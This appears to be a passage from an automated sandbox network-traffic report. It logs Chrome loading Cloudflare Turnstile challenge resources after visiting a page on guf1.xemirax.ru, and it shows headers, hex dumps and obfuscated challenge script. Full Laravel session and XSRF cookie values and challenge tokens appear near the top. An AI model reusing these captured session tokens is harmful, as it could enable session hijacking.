                                                          Sec-Fetch-Dest: image
                                                          Referer: https://guf1.xemirax.ru/6XAVE/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: XSRF-TOKEN=eyJpdiI6IlA5K2E4Ti9mZENIS3lsQXVLVGdHL3c9PSIsInZhbHVlIjoiUThJL3ZoV1R3aXU5U0lvT0lWaFcrMGZiK0VVc0JaZkUvakxiNk1FdE5mOXZzNGJxdTNEK0ZLUllmQURxejNmRjd5M0JqWUF6bFMxMjJLdVJTd2JhdzlrTFphUW1OVW5GTEFQV1Y4QldNemVReVJNbzdZSGwrOThyTXMrMTNwSXgiLCJtYWMiOiJmZDdiYzAzMTY3OTUwYTFkZmZlM2MxYTY2MmI1MTVjYzc5ODc2MjBmZTQ3NzAwMTNkOWMzYmI3ZTkwMjkzNzI5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlczZGtTbnF6S2x2OHgwTnF2WStTN3c9PSIsInZhbHVlIjoidmxMaGtSQStYdnVCL3BDRnJFeXNVOExZMTZyZG13T1IwYUhUK1RXaEVrWi9ZRkxUKy83YzJVaTFhblBpdTFUN013SHNJRE5jWnFCbWtqdlRHY2JQUWk5b3pKd1laMGFtdlVndVIrZm5sRWRLNmttWGFLNmxOdE4rdzdEcStWVUwiLCJtYWMiOiJlZjg1MThhNmQzODVlNWY4ODRmMDUyOWMzODdjMmQxYWFhOTk3MGZhMWIzNDMyOGEzOTc3YzI5M2I3ZjM1MDE2IiwidGFnIjoiIn0%3D
                                                          2025-01-16 04:17:34 UTC1063INHTTP/1.1 404 Not Found
                                                          Date: Thu, 16 Jan 2025 04:17:34 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Cache-Control: max-age=14400
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8sCMTUMDG2VsfSdc3ArV%2Br%2FNRadCkdMeik9Ze8DFnn%2B1n9SThKYUV9t1cWZVVh6M%2BQ892%2BqGUJxLthCzBZ22k5KIYAMwDI0JePi0fRnazvWXNVBkxZzUuyN0DqI9ZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Vary: Accept-Encoding
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5024&min_rtt=5004&rtt_var=1448&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2822&recv_bytes=2227&delivery_rate=551510&cwnd=32&unsent_bytes=0&cid=3b6c5cda120f0a7b&ts=147&x=0"
                                                          CF-Cache-Status: EXPIRED
                                                          Server: cloudflare
                                                          CF-RAY: 902b4beb79dc3ad6-IAD
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8487&min_rtt=8452&rtt_var=3240&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1893&delivery_rate=334287&cwnd=32&unsent_bytes=0&cid=df7a67d35900cede&ts=3967&x=0"
                                                          2025-01-16 04:17:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.449753104.18.95.414432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:34 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:34 UTC240INHTTP/1.1 200 OK
                                                          Date: Thu, 16 Jan 2025 04:17:34 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 61
                                                          Connection: close
                                                          cache-control: max-age=2629800, public
                                                          Server: cloudflare
                                                          CF-RAY: 902b4bed4a54443e-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-16 04:17:34 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.449754104.18.95.414432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:34 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902b4be51ba27c69&lang=auto HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:34 UTC331INHTTP/1.1 200 OK
                                                          Date: Thu, 16 Jan 2025 04:17:34 GMT
                                                          Content-Type: application/javascript; charset=UTF-8
                                                          Content-Length: 113788
                                                          Connection: close
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          Server: cloudflare
                                                          CF-RAY: 902b4bee587ff799-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-16 04:17:34 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                          2025-01-16 04:17:34 UTC1369INData Raw: 32 30 74 68 65 25 32 30 53 69 74 65 25 32 30 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 30 69 66 25 32 30 74 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61 63 6b 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30
                                                          Data Ascii: 20the%20Site%20Administrator%20if%20this%20problem%20persists.","testing_only":"Testing%20only.","turnstile_feedback_description":"Send%20Feedback","human_button_text":"Verify%20you%20are%20human","not_embedded":"This%20challenge%20must%20be%20embedded%20
                                                          2025-01-16 04:17:34 UTC1369INData Raw: 2c 66 4b 2c 66 56 2c 66 5a 2c 67 39 2c 67 64 2c 67 67 2c 67 68 2c 67 48 2c 67 65 2c 67 66 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 36 34 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 37 35 30 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 32 37 37 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 35 33 39 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 65 33 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 32 38 30 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 33 33 29 29 2f 37 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 33
                                                          Data Ascii: ,fK,fV,fZ,g9,gd,gg,gh,gH,ge,gf){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1064))/1*(parseInt(gI(750))/2)+parseInt(gI(277))/3+parseInt(gI(539))/4+-parseInt(gI(1e3))/5*(-parseInt(gI(280))/6)+-parseInt(gI(433))/7+-parseInt(gI(3
                                                          2025-01-16 04:17:34 UTC1369INData Raw: 3d 3d 3d 6a 3f 4c 5b 67 50 28 31 33 37 31 29 5d 28 67 50 28 31 30 31 39 29 2c 49 5b 67 50 28 31 35 35 35 29 5d 29 3a 44 3d 3d 3d 31 3f 4c 5b 67 50 28 31 33 37 31 29 5d 28 67 50 28 31 30 31 39 29 2c 67 50 28 31 31 35 38 29 29 3a 4c 5b 67 50 28 33 30 31 29 5d 5b 67 50 28 39 33 37 29 5d 28 67 50 28 37 30 34 29 29 2c 42 5b 67 50 28 38 36 39 29 5d 28 4c 29 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 67 4e 28 36 33 39 29 5d 5b 67 4e 28 31 30 32 37 29 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b 67 4e 28 33 34 31 29 5d 3b 44 3d 78 5b 43 5d 2c 45 3d 65 52 28 67 2c 68 2c 44 29 2c 42 28 45 29 3f 28 46 3d 6f 5b 67 4e 28 31 30 35 37 29 5d 28 27 73 27 2c 45 29 26 26 21 67 5b 67 4e 28 35 31 38 29 5d 28 68 5b 44 5d 29 2c 6f
                                                          Data Ascii: ===j?L[gP(1371)](gP(1019),I[gP(1555)]):D===1?L[gP(1371)](gP(1019),gP(1158)):L[gP(301)][gP(937)](gP(704)),B[gP(869)](L)}(x),B='nAsAaAb'.split('A'),B=B[gN(639)][gN(1027)](B),C=0;C<x[gN(341)];D=x[C],E=eR(g,h,D),B(E)?(F=o[gN(1057)]('s',E)&&!g[gN(518)](h[D]),o
                                                          2025-01-16 04:17:34 UTC1369INData Raw: 53 28 31 31 39 35 29 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 67 53 28 38 37 31 29 5d 5b 67 53 28 31 30 38 37 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 67 53 28 38 37 31 29 5d 5b 67 53 28 31 31 35 35 29 5d 2c 27 63 6f 64 65 27 3a 67 53 28 33 37 32 29 2c 27 72 63 56 27 3a 65 4d 5b 67 53 28 38 37 31 29 5d 5b 67 53 28 31 31 36 34 29 5d 7d 2c 27 2a 27 29 29 3a 64 5b 67 53 28 35 33 35 29 5d 3d 67 53 28 31 31 31 39 29 7d 2c 67 29 7d 2c 65 4d 5b 67 4a 28 31 36 30 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 67 54 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 29 7b 6b 3d 28 67 54 3d 67 4a 2c 6a 3d 7b 7d 2c 6a 5b 67 54 28 36 35 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47
                                                          Data Ascii: S(1195),'cfChlOut':eM[gS(871)][gS(1087)],'cfChlOutS':eM[gS(871)][gS(1155)],'code':gS(372),'rcV':eM[gS(871)][gS(1164)]},'*')):d[gS(535)]=gS(1119)},g)},eM[gJ(1606)]=function(g,h,i,gT,j,k,l,m,n,o,s,x,B,C,D,E,F){k=(gT=gJ,j={},j[gT(652)]=function(G,H){return G
                                                          2025-01-16 04:17:34 UTC1369INData Raw: 63 61 74 63 68 28 47 29 7b 7d 7d 2c 65 4d 5b 67 4a 28 37 30 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 67 55 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 76 2c 78 2c 42 2c 43 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 28 67 55 3d 67 4a 2c 66 3d 7b 7d 2c 66 5b 67 55 28 31 32 31 35 29 5d 3d 67 55 28 31 31 39 35 29 2c 66 5b 67 55 28 37 30 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3c 3c 76 7d 2c 66 5b 67 55 28 31 33 31 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 76 3d 3d 3d 73 7d 2c 66 5b 67 55 28 31 30 36 31 29 5d 3d 67 55 28 31 33 38 31 29 2c 66 5b 67 55 28 33 38 33 29 5d 3d 67 55 28 31 32 36 38 29 2c 67 3d 66 2c 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 29 3f 67 5b 67 55 28 31 33 31 32 29 5d 28
                                                          Data Ascii: catch(G){}},eM[gJ(703)]=function(e,gU,f,g,h,i,j,k,v,x,B,C,l,m,n,o){(gU=gJ,f={},f[gU(1215)]=gU(1195),f[gU(706)]=function(s,v){return s<<v},f[gU(1312)]=function(s,v){return v===s},f[gU(1061)]=gU(1381),f[gU(383)]=gU(1268),g=f,e instanceof Error)?g[gU(1312)](
                                                          2025-01-16 04:17:34 UTC1369INData Raw: 4d 5b 67 58 28 38 33 36 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 59 29 7b 67 59 3d 67 58 2c 65 4d 5b 67 59 28 31 36 35 39 29 5d 28 29 7d 2c 31 65 33 29 3a 28 6e 3d 7b 7d 2c 6e 5b 67 58 28 38 33 30 29 5d 3d 65 2c 6e 5b 67 58 28 31 31 37 34 29 5d 3d 66 2c 6e 5b 67 58 28 31 32 37 32 29 5d 3d 67 2c 6e 5b 67 58 28 38 33 35 29 5d 3d 68 2c 6e 5b 67 58 28 31 33 38 33 29 5d 3d 69 2c 6f 3d 6e 2c 65 4d 5b 67 58 28 38 33 36 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 5a 2c 76 2c 78 2c 42 29 7b 28 67 5a 3d 67 58 2c 67 5a 28 31 31 37 35 29 3d 3d 3d 67 5a 28 31 31 33 37 29 29 3f 28 76 3d 6b 5b 67 5a 28 31 36 36 36 29 5d 28 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 37 39 5d 5b 33 5d 5e 6b 5b 67 5a 28 35 36 37 29 5d 28 74 68 69 73 2e 68 5b 6b 5b 67 5a 28 31 31 36 33 29 5d 28 37
                                                          Data Ascii: M[gX(836)](function(gY){gY=gX,eM[gY(1659)]()},1e3):(n={},n[gX(830)]=e,n[gX(1174)]=f,n[gX(1272)]=g,n[gX(835)]=h,n[gX(1383)]=i,o=n,eM[gX(836)](function(gZ,v,x,B){(gZ=gX,gZ(1175)===gZ(1137))?(v=k[gZ(1666)](this.h[this.g^79][3]^k[gZ(567)](this.h[k[gZ(1163)](7
                                                          2025-01-16 04:17:34 UTC1369INData Raw: 36 31 35 29 5d 26 26 21 63 5b 69 68 28 31 35 38 35 29 5d 28 66 42 29 26 26 21 65 4d 5b 69 68 28 31 31 35 37 29 5d 5b 69 68 28 33 36 30 29 5d 26 26 65 2d 66 56 3e 64 3f 66 68 28 29 3a 63 5b 69 68 28 31 32 31 30 29 5d 3d 3d 3d 63 5b 69 68 28 31 32 35 31 29 5d 3f 65 3d 66 5b 69 68 28 31 33 36 36 29 5d 3a 66 69 28 29 7d 2c 31 65 33 29 29 2c 66 5a 3d 7b 7d 2c 66 5a 5b 67 4a 28 33 36 30 29 5d 3d 21 5b 5d 2c 66 5a 5b 67 4a 28 37 36 34 29 5d 3d 66 31 2c 66 5a 5b 67 4a 28 31 33 31 31 29 5d 3d 66 4e 2c 66 5a 5b 67 4a 28 33 38 31 29 5d 3d 66 53 2c 66 5a 5b 67 4a 28 37 37 38 29 5d 3d 66 54 2c 66 5a 5b 67 4a 28 33 39 30 29 5d 3d 66 4f 2c 66 5a 5b 67 4a 28 31 34 35 31 29 5d 3d 66 55 2c 66 5a 5b 67 4a 28 31 33 38 39 29 5d 3d 66 52 2c 66 5a 5b 67 4a 28 36 32 38 29 5d 3d
                                                          Data Ascii: 615)]&&!c[ih(1585)](fB)&&!eM[ih(1157)][ih(360)]&&e-fV>d?fh():c[ih(1210)]===c[ih(1251)]?e=f[ih(1366)]:fi()},1e3)),fZ={},fZ[gJ(360)]=![],fZ[gJ(764)]=f1,fZ[gJ(1311)]=fN,fZ[gJ(381)]=fS,fZ[gJ(778)]=fT,fZ[gJ(390)]=fO,fZ[gJ(1451)]=fU,fZ[gJ(1389)]=fR,fZ[gJ(628)]=
                                                          2025-01-16 04:17:34 UTC1369INData Raw: 28 31 36 36 38 29 5d 28 74 68 69 73 2e 68 5b 37 39 5e 74 68 69 73 2e 67 5d 5b 30 5d 2b 2b 29 2c 33 32 29 2c 32 35 36 29 2c 32 35 35 29 2c 69 5b 33 5d 3d 65 5b 69 75 28 31 32 32 31 29 5d 28 74 68 69 73 2e 68 5b 37 39 2e 37 5e 74 68 69 73 2e 67 5d 5b 33 5d 5e 65 5b 69 75 28 31 36 36 32 29 5d 28 32 32 34 2b 74 68 69 73 2e 68 5b 74 68 69 73 2e 67 5e 37 39 2e 36 39 5d 5b 31 5d 5b 69 75 28 31 36 36 38 29 5d 28 74 68 69 73 2e 68 5b 37 39 5e 74 68 69 73 2e 67 5d 5b 30 5d 2b 2b 29 2c 32 35 35 29 2c 31 32 33 29 2c 69 5b 30 5d 3d 6a 7d 7d 2c 65 4d 5b 67 4a 28 38 32 37 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 4a 28 31 30 30 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 4f 29 7b 69 66 28 69 4f 3d 67 4a 2c 65 4d 5b 69 4f 28 38 32 37 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 69 4f 28
                                                          Data Ascii: (1668)](this.h[79^this.g][0]++),32),256),255),i[3]=e[iu(1221)](this.h[79.7^this.g][3]^e[iu(1662)](224+this.h[this.g^79.69][1][iu(1668)](this.h[79^this.g][0]++),255),123),i[0]=j}},eM[gJ(827)]=![],eM[gJ(1009)]=function(iO){if(iO=gJ,eM[iO(827)])return;eM[iO(
                                                          2025-01-16 04:17:34 UTC1369INData Raw: 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 55 56 68 6f 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 4e 78 6f 53 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 59 70 63 66 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 64 65 69 61 59 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 67 52 70 45 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 70 4e 43 57 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 76 74 56 6e 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 50
                                                          Data Ascii: eturn i==h},'UVhok':function(h,i){return h-i},'NxoSJ':function(h,i){return h==i},'Ypcfq':function(h,i){return h-i},'deiaY':function(h,i){return h==i},'gRpEh':function(h,i){return h==i},'pNCWn':function(h,i){return h>i},'vtVnw':function(h,i){return h&i},'P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.449755104.18.95.414432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:34 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/987784403:1736998059:j2mCdESRnQ8yAuLeOGvba0XQvnpuDmbh_9ABveMbcN0/902b4be51ba27c69/vbgMLT9MxL8q4zhAdo_qwd.NQaOTep2gg5XAtNTcCio-1737001052-1.1.1.1-m_P7qnsuqumSsU9TuvygpI799LfIg6Lk.JQ83Ib7Jt7nwJnE7SlCIvFSZYB80Ubu HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          Content-Length: 3171
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Content-type: application/x-www-form-urlencoded
                                                          CF-Chl-RetryAttempt: 0
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          CF-Challenge: vbgMLT9MxL8q4zhAdo_qwd.NQaOTep2gg5XAtNTcCio-1737001052-1.1.1.1-m_P7qnsuqumSsU9TuvygpI799LfIg6Lk.JQ83Ib7Jt7nwJnE7SlCIvFSZYB80Ubu
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://challenges.cloudflare.com
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7g7ou/0x4AAAAAAA0MDA1Jbl1ciyqP/auto/fbE/normal/auto/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:34 UTC3171OUTData Raw: 76 5f 39 30 32 62 34 62 65 35 31 62 61 32 37 63 36 39 3d 6b 33 6d 6a 47 6a 42 6a 37 6a 79 6a 71 38 62 52 38 62 2d 6a 38 73 32 4f 77 72 73 62 35 38 56 56 62 57 70 62 32 6f 6a 38 51 62 53 6a 32 6d 72 32 36 51 6d 62 69 65 51 62 43 49 38 25 32 62 6b 62 50 6a 38 2d 6d 62 32 45 7a 33 30 78 62 45 4f 62 4b 62 38 33 62 45 6d 4a 6f 62 70 62 30 6f 32 56 62 4f 6f 65 6d 62 37 6b 49 30 72 64 6f 7a 4a 78 77 42 62 6b 37 67 2d 46 62 35 51 49 62 67 62 76 74 39 57 51 76 73 4f 38 35 4e 74 4d 64 2b 69 2b 62 54 4b 4b 4c 35 6a 30 5a 62 32 42 68 62 53 54 67 77 52 6d 62 4a 69 62 62 71 6f 30 55 43 68 50 57 4a 2b 5a 32 6f 56 4d 30 6e 73 50 46 54 7a 71 74 62 65 42 35 39 50 30 4b 62 32 7a 62 61 34 4f 75 4c 30 24 62 4a 7a 7a 73 67 6f 62 41 53 44 49 62 24 7a 53 75 51 56 7a 36 50 39 57
                                                          Data Ascii: v_902b4be51ba27c69=k3mjGjBj7jyjq8bR8b-j8s2Owrsb58VVbWpb2oj8QbSj2mr26QmbieQbCI8%2bkbPj8-mb2Ez30xbEObKb83bEmJobpb0o2VbOoemb7kI0rdozJxwBbk7g-Fb5QIbgbvt9WQvsO85NtMd+i+bTKKL5j0Zb2BhbSTgwRmbJibbqo0UChPWJ+Z2oVM0nsPFTzqtbeB59P0Kb2zba4OuL0$bJzzsgobASDIb$zSuQVz6P9W
                                                          2025-01-16 04:17:34 UTC751INHTTP/1.1 200 OK
                                                          Date: Thu, 16 Jan 2025 04:17:34 GMT
                                                          Content-Type: text/plain; charset=UTF-8
                                                          Content-Length: 153164
                                                          Connection: close
                                                          cf-chl-gen: ycYRkSA6MlFIuHHSSjFOzphmfzJtaESs1eVFN3rqb/kgo9sdFe0aODxUNmJItT7h/oX1zOZ2rdgpIJb11KAofAXzOF3aR8X1zeeCPtNMRsxCGFOihZI7dl9xmi+TE1EZtVrI/XEZlJMQ6dlsrMrSsko65zfp1pjMmg5ojPe2vpPnKzuNod6uyln/tUrt+7Cubg0EE8zgPcJq7CQcJLvPMbQpgJlB+/fX33ySMR9SY6bfdPYqm7+9N3MQd/+3FpAxjkYE8BgIoQgrB5Wldxxh0cHpHo14vhNX25sJ7He43COPSElIvq8PrzdKbocbViatpum0Oa7qvmGu8yxhL76VQnTDAtAfSO49FVrcMw/YkX9MZJnSL1fHZcJdbi5+AT5CqdmKA/zPTt0sMjhD8YG54nj8JWroWnQ4HmO2lUSkwVZI8Kn1f8R5j25Ot+CrnW00i5mvy0OfT/ls0ST5AK/yysjsniOjLAheZp4DSCsaVHs=$ks5gLOjcwgqHfWQHVXyCiA==
                                                          Server: cloudflare
                                                          CF-RAY: 902b4bef3dbbc42c-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-16 04:17:34 UTC618INData Raw: 6b 6e 37 48 6c 4a 4f 38 71 36 61 71 71 59 79 4f 76 5a 47 38 75 36 32 4e 6a 73 4f 32 70 70 71 71 6d 74 61 34 79 4c 36 36 31 39 36 7a 6c 35 79 35 75 4f 4f 69 33 4d 44 61 75 73 69 36 33 36 75 71 30 75 79 6f 2b 4d 44 47 73 62 66 4e 79 63 62 52 2f 74 4c 58 38 73 4c 30 35 63 62 56 42 4f 49 45 31 4f 72 6b 37 42 48 6c 2b 2f 77 55 36 68 54 6a 7a 77 51 4d 2b 41 55 54 38 66 72 73 49 68 34 44 41 52 59 69 42 77 6e 32 4b 53 55 4c 35 42 37 37 37 53 63 4b 44 77 51 71 41 7a 63 4f 4b 68 66 31 4c 78 51 32 39 76 64 42 41 79 4d 6a 2f 54 34 58 4a 77 4a 4b 4b 54 6c 46 48 78 41 6f 48 55 67 71 4a 79 68 4f 55 44 41 69 47 69 56 47 4c 52 67 38 56 6c 70 51 57 44 5a 6e 4c 32 55 35 57 6b 64 71 53 7a 68 74 61 30 56 78 4c 32 42 45 63 55 51 32 4d 6c 5a 55 53 48 41 34 64 49 46 51 54 59 4a
                                                          Data Ascii: kn7HlJO8q6aqqYyOvZG8u62NjsO2ppqqmta4yL66196zl5y5uOOi3MDausi636uq0uyo+MDGsbfNycbR/tLX8sL05cbVBOIE1Ork7BHl+/wU6hTjzwQM+AUT8frsIh4DARYiBwn2KSUL5B777ScKDwQqAzcOKhf1LxQ29vdBAyMj/T4XJwJKKTlFHxAoHUgqJyhOUDAiGiVGLRg8VlpQWDZnL2U5WkdqSzhta0VxL2BEcUQ2MlZUSHA4dIFQTYJ
